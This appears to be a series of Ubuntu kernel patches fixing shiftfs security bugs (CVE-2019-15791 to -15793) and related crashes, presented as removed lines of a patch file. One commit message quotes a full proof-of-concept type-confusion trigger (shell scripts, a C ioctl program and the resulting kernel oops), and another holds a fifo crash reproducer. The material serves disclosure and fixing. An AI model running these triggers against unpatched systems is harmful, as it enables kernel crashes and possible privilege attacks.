ffff93f1fb792208 R09: 0000000000000000 -[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0 -[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40 -[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000 -[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 -[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0 -[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 -[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 -======================================= - -Disassembly of surrounding code: - -55 push rbp -4889E5 mov rbp,rsp -4157 push r15 -4156 push r14 -4155 push r13 -4154 push r12 -488B87C8000000 mov rax,[rdi+0xc8] -4C8B6810 mov r13,[rax+0x10] -498B4528 mov rax,[r13+0x28] -4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE -0F8497000000 jz near 0xcc -4989FC mov r12,rdi -4989F6 mov r14,rsi - -This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I -think this corresponds to the load of "realfile->f_op->mmap" in the source code. 
- -Reported-by: Jann Horn <jannh@google.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> - -CVE-2019-15791 - -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 35 +++++++++++++++++++++-------------- - 1 file changed, 21 insertions(+), 14 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 0d6ce377b07c..9a6a7ad50b90 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd) - return false; - } - --static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd, -- void __user *arg, -+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg, - struct btrfs_ioctl_vol_args *v1, - struct btrfs_ioctl_vol_args_v2 *v2) - { -@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd, - else - ret = copy_to_user(arg, v2, sizeof(*v2)); - -- fdput(lfd); - __close_fd(current->files, fd); - kfree(v1); - kfree(v2); -@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd, - static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - struct btrfs_ioctl_vol_args **b1, - struct btrfs_ioctl_vol_args_v2 **b2, -- struct fd *lfd, - int *newfd) - { - int oldfd, ret; - struct fd src; -+ struct fd lfd = {}; - struct btrfs_ioctl_vol_args *v1 = NULL; - struct btrfs_ioctl_vol_args_v2 *v2 = NULL; - -@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - if (!src.file) - return -EINVAL; - -- ret = shiftfs_real_fdget(src.file, lfd); -- fdput(src); -- if (ret) -+ ret = shiftfs_real_fdget(src.file, &lfd); -+ if (ret) { -+ fdput(src); - return ret; -+ } -+ -+ /* -+ * shiftfs_real_fdget() does not take a reference to lfd.file, so -+ * take a reference here to offset the one which will be put by -+ * __close_fd(), and make sure that 
reference is put on fdput(lfd). -+ */ -+ get_file(lfd.file); -+ lfd.flags |= FDPUT_FPUT; -+ fdput(src); - -- *newfd = get_unused_fd_flags(lfd->file->f_flags); -+ *newfd = get_unused_fd_flags(lfd.file->f_flags); - if (*newfd < 0) { -- fdput(*lfd); -+ fdput(lfd); - return *newfd; - } - -- fd_install(*newfd, lfd->file); -+ fd_install(*newfd, lfd.file); - - if (cmd == BTRFS_IOC_SNAP_CREATE) { - v1->fd = *newfd; -@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - } - - if (ret) -- shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2); -+ shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2); - - return ret; - } -@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - int newfd = -EBADF; - long err = 0, ret = 0; - void __user *argp = (void __user *)arg; -- struct fd btrfs_lfd = {}; - struct super_block *sb = file->f_path.dentry->d_sb; - struct btrfs_ioctl_vol_args *btrfs_v1 = NULL; - struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL; - - ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2, -- &btrfs_lfd, &newfd); -+ &newfd); - if (ret < 0) - return ret; - -@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - fdput(lowerfd); - - out_restore: -- err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp, -+ err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp, - btrfs_v1, btrfs_v2); - if (!ret) - ret = err; --- -2.39.2 - -From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Fri, 1 Nov 2019 14:19:16 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1850867 - -Verify filesystem type in shiftfs_real_fdget(). 
- -Quoting Jann Horn: - #################### Bug 2: Type confusion #################### - - shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks - passes the resulting file* into shiftfs_real_fdget(), which does this: - - static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) - { - struct shiftfs_file_info *file_info = file->private_data; - struct file *realfile = file_info->realfile; - - lowerfd->flags = 0; - lowerfd->file = realfile; - - /* Did the flags change since open? */ - if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) - return shiftfs_change_flags(lowerfd->file, file->f_flags); - - return 0; - } - - file->private_data is a void* that points to a filesystem-dependent type; and - some filesystems even use it to store a type-cast number instead of a pointer. - The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast. - - As a PoC, here I'm causing a type confusion between struct shiftfs_file_info - (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at - offset 0x10), and I use that to cause a memory dereference somewhere around - 0x4242: - - ======================================= - user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh - #!/bin/sh - sync - unshare -mUr ./run2.sh - user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh - #!/bin/sh - set -e - - mkdir -p mnt/tmpfs - mkdir -p mnt/shiftfs - mount -t tmpfs none mnt/tmpfs - mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs - mount|grep shift - gcc -o ioctl ioctl.c -Wall - ./ioctl - user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c - #include <sys/ioctl.h> - #include <fcntl.h> - #include <err.h> - #include <unistd.h> - #include <linux/btrfs.h> - #include <sys/mman.h> - - int main(void) { - // make our vmacache sequence number something like 0x4242 - for (int i=0; i<0x4242; i++) { - void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ, - MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); - if (x == MAP_FAILED) 
err(1, "mmap vmacache seqnum"); - munmap(x, 0x1000); - } - - int root = open("mnt/shiftfs", O_RDONLY); - if (root == -1) err(1, "open shiftfs root"); - int foofd = open("/proc/self/environ", O_RDONLY); - if (foofd == -1) err(1, "open foofd"); - // trigger the confusion - struct btrfs_ioctl_vol_args iocarg = { - .fd = foofd - }; - ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg); - } - user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh - none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000) - /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2) - [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289 - [ 348.105060] #PF: supervisor read access in kernel mode - [ 348.106573] #PF: error_code(0x0000) - not-present page - [ 348.108102] PGD 0 P4D 0 - [ 348.108871] Oops: 0000 [#1] SMP PTI - [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu - [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014 - [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs] - [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75 - [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246 - [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249 - [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004 - [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150 - [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401 - [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004 - [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000 - [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 
- [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0 - [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 - [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 - [ 348.143545] Call Trace: - [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs] - [ 348.145562] do_vfs_ioctl+0x407/0x670 - [ 348.146620] ? putname+0x4a/0x50 - [ 348.147556] ksys_ioctl+0x67/0x90 - [ 348.148514] __x64_sys_ioctl+0x1a/0x20 - [ 348.149593] do_syscall_64+0x5a/0x130 - [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9 - [ 348.152108] RIP: 0033:0x7f77fa76767b - [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48 - [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010 - [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b - [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003 - [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000 - [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100 - [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000 - [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci 
net_failover failover virtio_blk - [ 348.188617] CR2: 0000000000004289 - [ 348.189586] ---[ end trace dad859a1db86d660 ]--- - [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs] - [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75 - [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246 - [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249 - [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004 - [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150 - [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401 - [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004 - [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000 - [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 - [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0 - [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 - [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 - Killed - user@ubuntu1910vm:~/shiftfs_confuse$ - -Reported-by: Jann Horn <jannh@google.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -[ saf: use f_op->open instead as special inodes in shiftfs sbs - will not use shiftfs open f_ops ] -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> - -CVE-2019-15792 - -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 33 +++++++++++++++++++-------------- - 1 file changed, 19 insertions(+), 14 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 9a6a7ad50b90..897e0163005e 100644 ---- a/fs/shiftfs.c -+++ 
b/fs/shiftfs.c -@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags) - return 0; - } - --static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) --{ -- struct file *realfile = file->private_data; -- -- lowerfd->flags = 0; -- lowerfd->file = realfile; -- -- /* Did the flags change since open? */ -- if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) -- return shiftfs_change_flags(lowerfd->file, file->f_flags); -- -- return 0; --} -- - static int shiftfs_open(struct inode *inode, struct file *file) - { - struct file *realfile; -@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb) - return flags; - } - -+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) -+{ -+ struct file *realfile; -+ -+ if (file->f_op->open != shiftfs_open && -+ file->f_op->open != shiftfs_dir_open) -+ return -EINVAL; -+ -+ realfile = file->private_data; -+ lowerfd->flags = 0; -+ lowerfd->file = realfile; -+ -+ /* Did the flags change since open? */ -+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) -+ return shiftfs_change_flags(lowerfd->file, file->f_flags); -+ -+ return 0; -+} -+ - static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter) - { - struct file *file = iocb->ki_filp; --- -2.39.2 - -From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Fri, 1 Nov 2019 13:35:25 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs - operations -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1850867 - -Several locations which shift ids translate user/group ids before -performing operations in the lower filesystem are translating -them into init_user_ns, whereas they should be translated into -the s_user_ns for the lower filesystem. 
This will result in using -ids other than the intended ones in the lower fs, which will -likely not map into the shifts s_user_ns. - -Change these sites to use shift_k[ug]id() to do a translation -into the s_user_ns of the lower filesystem. - -Reported-by: Jann Horn <jannh@google.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> - -CVE-2019-15793 - -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 43 +++++++++++++++++++++++-------------------- - 1 file changed, 23 insertions(+), 20 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 897e0163005e..04fba4689eb6 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -83,12 +83,27 @@ static inline void shiftfs_revert_object_creds(const struct cred *oldcred, - put_cred(newcred); - } - -+static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to, -+ kuid_t kuid) -+{ -+ uid_t uid = from_kuid(from, kuid); -+ return make_kuid(to, uid); -+} -+ -+static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to, -+ kgid_t kgid) -+{ -+ gid_t gid = from_kgid(from, kgid); -+ return make_kgid(to, gid); -+} -+ - static int shiftfs_override_object_creds(const struct super_block *sb, - const struct cred **oldcred, - struct cred **newcred, - struct dentry *dentry, umode_t mode, - bool hardlink) - { -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; - kuid_t fsuid = current_fsuid(); - kgid_t fsgid = current_fsgid(); - -@@ -100,8 +115,8 @@ static int shiftfs_override_object_creds(const struct super_block *sb, - return -ENOMEM; - } - -- (*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid)); -- (*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid)); -+ (*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid); -+ (*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid); - - if (!hardlink) { - int err = 
security_dentry_create_files_as(dentry, mode, -@@ -117,20 +132,6 @@ static int shiftfs_override_object_creds(const struct super_block *sb, - return 0; - } - --static kuid_t shift_kuid(struct user_namespace *from, struct user_namespace *to, -- kuid_t kuid) --{ -- uid_t uid = from_kuid(from, kuid); -- return make_kuid(to, uid); --} -- --static kgid_t shift_kgid(struct user_namespace *from, struct user_namespace *to, -- kgid_t kgid) --{ -- gid_t gid = from_kgid(from, kgid); -- return make_kgid(to, gid); --} -- - static void shiftfs_copyattr(struct inode *from, struct inode *to) - { - struct user_namespace *from_ns = from->i_sb->s_user_ns; -@@ -758,6 +759,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - struct iattr newattr; - const struct cred *oldcred; - struct super_block *sb = dentry->d_sb; -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; - int err; - - err = setattr_prepare(dentry, attr); -@@ -765,8 +767,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - return err; - - newattr = *attr; -- newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid)); -- newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid)); -+ newattr.ia_uid = shift_kuid(sb->s_user_ns, sbinfo->userns, attr->ia_uid); -+ newattr.ia_gid = shift_kgid(sb->s_user_ns, sbinfo->userns, attr->ia_gid); - - /* - * mode change is for clearing setuid/setgid bits. 
Allow lower fs -@@ -1356,6 +1358,7 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb, - const struct cred **oldcred, - struct cred **newcred) - { -+ struct shiftfs_super_info *sbinfo = sb->s_fs_info; - kuid_t fsuid = current_fsuid(); - kgid_t fsgid = current_fsgid(); - -@@ -1367,8 +1370,8 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb, - return -ENOMEM; - } - -- (*newcred)->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, fsuid)); -- (*newcred)->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, fsgid)); -+ (*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid); -+ (*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid); - - /* clear all caps to prevent bypassing capable() checks */ - cap_clear((*newcred)->cap_bset); --- -2.39.2 - -From f140d37a80df29e1746b9ba9a29cf5b505c6a70f Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Fri, 17 Jan 2020 16:17:06 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent lower dentries from going - negative during unlink -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1860041 - -All non-special files (For shiftfs this only includes fifos and - for -this case - unix sockets - since we don't allow character and block -devices to be created.) go through shiftfs_open() and have their dentry -pinned through this codepath preventing it from going negative. But -fifos don't use the shiftfs fops but rather use the pipefifo_fops which -means they do not go through shiftfs_open() and thus don't have their -dentry pinned that way. Thus, the lower dentries for such files can go -negative on unlink causing segfaults. 
The following C program can be -used to reproduce the crash: - - #include <stdio.h> - #include <fcntl.h> - #include <unistd.h> - #include <sys/types.h> - #include <sys/stat.h> - #include <unistd.h> - #include <stdlib.h> - - int main(int argc, char *argv[]) - { - struct stat stat; - - unlink("./bbb"); - - int ret = mknod("./bbb", S_IFIFO|0666, 0); - if (ret < 0) - exit(1); - - int fd = open("./bbb", O_RDWR); - if (fd < 0) - exit(2); - - if (unlink("./bbb")) - exit(4); - - fstat(fd, &stat); - - return 0; - } - -Similar to ecryptfs we need to dget() the lower dentry before calling -vfs_unlink() on it and dput() it afterwards. - -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3 -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 04fba4689eb6..3623d02b061e 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -583,6 +583,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - int err; - const struct cred *oldcred; - -+ dget(lowerd); - oldcred = shiftfs_override_creds(dentry->d_sb); - inode_lock_nested(loweri, I_MUTEX_PARENT); - if (rmdir) -@@ -602,6 +603,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - inode_unlock(loweri); - - shiftfs_copyattr(loweri, dir); -+ dput(lowerd); - - return err; - } --- -2.39.2 - -From c9d38b0997c70e60f89b31c83d1b7a1e375f28b1 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Fri, 10 Apr 2020 16:55:28 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: record correct creator credentials -Cc: mpagano@gentoo.org - -BugLink: 
https://bugs.launchpad.net/bugs/1872094 - -When shiftfs is nested we failed to be able to create any files or -access directories because we recorded the wrong creator credentials. We -need to record the credentials of the creator of the lowers mark mount -of shiftfs. Otherwise we aren't privileged wrt to the shiftfs layer in -the nesting case. This is similar to how we always record the user -namespace of the base filesystem. - -Suggested-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 17 +++++++++-------- - 1 file changed, 9 insertions(+), 8 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 3623d02b061e..5c39529d0a17 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -2020,6 +2020,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - * parent mark mountpoint. - */ - sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark; -+ sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred); - } else { - sbinfo->mnt = mntget(path.mnt); - dentry = dget(path.dentry); -@@ -2028,16 +2029,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - * are identical. - */ - sbinfo->passthrough_mark = sbinfo->passthrough; -- } - -- cred_tmp = prepare_creds(); -- if (!cred_tmp) { -- err = -ENOMEM; -- goto out_put_path; -+ cred_tmp = prepare_creds(); -+ if (!cred_tmp) { -+ err = -ENOMEM; -+ goto out_put_path; -+ } -+ /* Don't override disk quota limits or use reserved space. */ -+ cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE); -+ sbinfo->creator_cred = cred_tmp; - } -- /* Don't override disk quota limits or use reserved space. 
*/ -- cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE); -- sbinfo->creator_cred = cred_tmp; - } else { - /* - * This leg executes if we're admin capable in the namespace, --- -2.39.2 - -From 485977eb4fb2701211275d28ca4fdbec87704a18 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Wed, 20 May 2020 13:44:27 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: let userns root destroy subvolumes - from other users -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1879688 - -Stéphane reported a bug found during NorthSec that makes heavy use of -shiftfs. When a subvolume or snapshot is created as userns root in the -container and then chowned to another user a delete as the root user -will fail. The reason for this is that we drop all capabilities as a -safety measure before calling btrfs ioctls. The only workable fix I -could think of is to retain the CAP_DAC_OVERRIDE capability for the -BTRFS_IOC_SNAP_DESTROY ioctl. All other solutions would be way more -invasive. 
- -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Cc: Seth Forshee <seth.forshee@canonical.com> -Acked-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 14 ++++++++++++-- - 1 file changed, 12 insertions(+), 2 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 5c39529d0a17..5d88193b41db 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1356,7 +1356,7 @@ static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len, - return ret; - } - --static int shiftfs_override_ioctl_creds(const struct super_block *sb, -+static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb, - const struct cred **oldcred, - struct cred **newcred) - { -@@ -1381,6 +1381,16 @@ static int shiftfs_override_ioctl_creds(const struct super_block *sb, - cap_clear((*newcred)->cap_inheritable); - cap_clear((*newcred)->cap_permitted); - -+ if (cmd == BTRFS_IOC_SNAP_DESTROY) { -+ kuid_t kuid_root = make_kuid(sb->s_user_ns, 0); -+ /* -+ * Allow the root user in the container to remove subvolumes -+ * from other users. 
-+ */ -+ if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root)) -+ cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE); -+ } -+ - put_cred(override_creds(*newcred)); - return 0; - } -@@ -1513,7 +1523,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd, - if (ret) - goto out_restore; - -- ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred); -+ ret = shiftfs_override_ioctl_creds(cmd, sb, &oldcred, &newcred); - if (ret) - goto out_fdput; - --- -2.39.2 - -From e090464bdd744306b3b766b2a675ee26e934f1ef Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Mon, 15 Jun 2020 15:16:11 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs -- Fix build errors from missing - fiemap definitions -Cc: mpagano@gentoo.org - -shiftfs FTBFS with 5.8-rc1: - - /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c: In function 'shiftfs_fiemap': - /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:13: error: dereferencing pointer to incomplete type 'struct fiemap_extent_info' - /tmp/kernel-sforshee-6727637082e4-45IQ/build/fs/shiftfs.c:731:26: error: 'FIEMAP_FLAG_SYNC' undeclared (first use in this function); did you mean 'FS_XFLAG_SYNC'? - -It seems that shiftfs was getting linux/fiemap.h included -indirectly before. Include it directly. 
